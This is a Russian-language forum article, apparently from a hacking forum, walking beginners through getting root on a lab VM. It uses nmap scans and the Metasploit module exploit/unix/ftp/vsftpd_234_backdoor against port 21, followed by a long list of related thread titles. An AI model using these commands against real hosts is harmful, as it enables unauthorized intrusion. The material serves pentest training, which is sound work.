Статья - Пентест. Как получить свои первые root права.

Admin

Администратор

21.01.2026

Пентест. Как получить свои первые root права.

Разведка
Как только мы получили айпишник с виртуалки,прыгает в Kali.

Начинаем сканировать IP командой - nmap[IP]

Видим много открытых портов. Будем атаковать 21 порт!

Пишем следующую команду - nmap -sV -p21[IP]

Нас интересует то что подчёркнуто а именно эксплойт который мы можем применить.

Реализация
Пишем следующее msfconsole -q
Ждем когда вылезит - msf>
После прописываем search vsftpd(без версии)

Выбираем 1(подчеркнул красным) и прописываем путь - use exploit/unix/ftp/vsftpd_234_backdoor

Это как раз тот эксплоит который мы будем использовать.

После чего пишем куда все это отправим - set RHOSTS[IP]
А после чего пишем - exploit

Немного ожидаете загрузки и пишите whoami
Если у вас вылезла - root, то могу вас поздравить вы получили root права.

Что бы убедиться что действительно мы получили root права то пропишите несколько команд.
id
uname -a

Последнее редактирование: 22.01.2026

	Легальный пентест или оружие хакеров?	Новости в сети	0	12.11.2025
	Интересно Что такое пентест и типы?	Уязвимости и взлом	0	02.03.2021
D	Ищу специалиста, пентест	Предоставляю работу. Ищу специалиста.	1	15.02.2020
G	Sn1per - автоматический пентест	Уязвимости и взлом	0	02.09.2018
	Статья Как понять что в файле склейка	Вирусология	0	Воскресенье в 01:10
	Интересно Как взломать взломщика? Достаточно найти в его коде одну «забытую кнопку».	Новости в сети	0	Воскресенье в 01:03
	Интересно Хакер думал, что украл пароль, а на самом деле – позвонил в полицию. На GitHub учат, как развести взломщика на эмоции (и логи).	Новости в сети	0	27.01.2026
	Интересно Четверть биткоина за «квантовые мозги». Рассказываем, как поднять крипту на знании физики.	Новости в сети	0	26.01.2026
	Интересно Один пакет = полный контроль VMware — дыру не латают 18 месяцев, серверы падают как домино.	Новости в сети	0	26.01.2026
	Статья Как на основе ФИО, даты рождения и района получить номер паспорта и ИНН.	OSINT	0	25.01.2026
	Интересно Как найти утеряные биткоин-адреса и закрытые ключи	Полезные статьи	0	24.01.2026
	Статья Ядовитые гифки. Как работает уязвимость GIFShell	Уязвимости и взлом	0	22.01.2026
	Интересно Ваш компьютер ведет двойную жизнь. Как домашние IP становятся инструментом в руках хакеров.	Новости в сети	0	21.01.2026
	Интересно «Отдай мастер-пароль, или всё удалим!». Как хакеры берут на мушку пользователей LastPass.	Новости в сети	0	21.01.2026
	Интересно Секретные настройки браузера для боссов: как вычистить всё лишнее из Chrome и Firefox без сомнительных форков.	Новости в сети	0	20.01.2026
	Интересно Сначала помогут, потом ограбят. Как хакеры превратили Microsoft Quick Assist в «троянского коня».	Новости в сети	0	20.01.2026
	Интересно Ваш принтер не то, чем кажется. Как хакеры прячут вирусы в установщиках драйверов.	Новости в сети	0	18.01.2026
	Статья Как правильно изучать malware-кодинг под Windows	Вирусология	0	17.01.2026
	Интересно «Пароль01» и дырявый VPN. Как пустить хакеров в сеть, чтобы они сломали вообще всё (пошаговая инструкция).	Новости в сети	0	12.01.2026
	Статья Как "Казаки" паттерны мошенников-"Разбойников" вычисляют, вооружаясь технологиями.	Анонимность и приватность	0	10.01.2026
	Интересно Ваш сервер — их притон: как группа UAT-7290 сдает ваши сервера в аренду своим друзьям. Дорого.	Новости в сети	0	09.01.2026
	Интересно Как стать «богом» в Linux, просто правильно подгадав время. Спойлер: вам понадобится Chronomaly.	Новости в сети	0	09.01.2026
	Статья Как оставаться незаметным в 2025 году – простые правила оперативной безопасности для всех.	Анонимность и приватность	0	08.01.2026
	Статья HTTP Request Smuggling в 2025: Как обходить современные WAF	Уязвимости и взлом	0	07.01.2026
	Статья Криптография в малвари: Как работают вымогатели (Ransomware).	Полезные статьи	0	07.01.2026
	Статья Право на root. Как повышают привилегии в Linux.	Уязвимости и взлом	0	02.01.2026
	Статья Как простой баг повреждения памяти ядра Linux приводит к полной компрометации системы(Часть 2)	Уязвимости и взлом	0	02.01.2026
	Статья Как простой баг повреждения памяти ядра Linux приводит к полной компрометации системы(Часть 1)	Уязвимости и взлом	0	02.01.2026
	Статья Как Mozilla упустила (не)очевидную уязвимость	Уязвимости и взлом	0	02.01.2026
	Статья Почему ваш «Windows» прокси палится как Linux: Глубокий разбор TCP Window Size, о котором молчат.	Анонимность и приватность	0	31.12.2025
	Интересно Старый конь борозды не испортит. Как сертификат десятилетней давности помог хакерам проникнуть в госучреждения Азии.	Новости в сети	0	30.12.2025
	Статья Direct Syscalls vs EDR: Как заставить Windows выполнять ваши команды в обход хуков защитного ПО	Вирусология	0	29.12.2025
	Интересно Gemini лезет из каждой дыры Chrome? Вот как убить все ИИ-кнопки и вернуть нормальный браузер.	Новости в сети	0	28.12.2025
	Интересно «Здравствуйте, я журналист, заполните анкету». Как хакеры из КНДР «разводят» южнокорейских экспертов.	Новости в сети	0	27.12.2025
	Статья Гейминг как источник данных: OSINT в виртуальных мирах	OSINT	0	27.12.2025
	Статья Крипто-детектив: Идем по следу транзакций. Как деанонить блокчейн.	OSINT	0	27.12.2025
	Интересно Семь миллионов долларов за одну ночь. Рассказываем, как пострадали пользователи Trust Wallet и что делать сейчас.	Новости в сети	0	27.12.2025
	Интересно Казалось, что летим, а на деле — ползём. Как ИИ-помощники незаметно крадут время у профессиональных кодеров.	Новости в сети	0	25.12.2025
	Статья Анонимные мессенджеры: Как общаться, не оставляя следов	Анонимность и приватность	0	24.12.2025
	Интересно Охотник стал добычей. Как «безопасники» ловят вирусы, пытаясь скачать инструменты для их поиска.	Новости в сети	0	24.12.2025
	Интересно Цифровое чудо на Рождество. Как ученым удалось восстановить UNIX V4 с ленты 1970-х годов.	Новости в сети	0	24.12.2025
	Статья Взгляд с другой стороны: как Linux админ ловит вас	Полезные статьи	0	20.12.2025
	Статья Как отслеживается e-mail?	OSINT	0	19.12.2025
	«Менеджер» с архивом и черным ходом через Yandex. Как группировка APT31 годами шпионила за российскими IT-компаниями	Новости в сети	1	24.11.2025
	От 314 до 968 млрд рублей. Как российский рынок кибербезопасности станет монополией за 6 лет	Новости в сети	0	18.11.2025
	Перевод крупной суммы по СБП на свой же счёт будет расцениваться банком как подозрительный	Новости в сети	0	13.11.2025
	Перехват DNS – что это за атака и как она работает?	Новости в сети	0	10.11.2025
	Суверенный Рунет. Мишустин подписал постановление о том, как им будут управлять (и от чего защищать)	Новости в сети	0	10.11.2025
	$120000000 испарились за утро: как хакерам удалось обойти 10 аудитов и причем здесь ракетная программа КНДР	Новости в сети	0	05.11.2025
	Одна буква — миллионные потери. Как русская «Е» обманула разработчиков и присвоила их крипту	Новости в сети	0	24.10.2025

Статья Пентест. Как получить свои первые root права.

Admin

Администратор

Пентест. Как получить свои первые root права.

Название темы

Статья Пентест. Как получить свои первые root права.

Admin

Администратор

Пентест. Как получить свои первые root права.​

Название темы

Пентест. Как получить свои первые root права.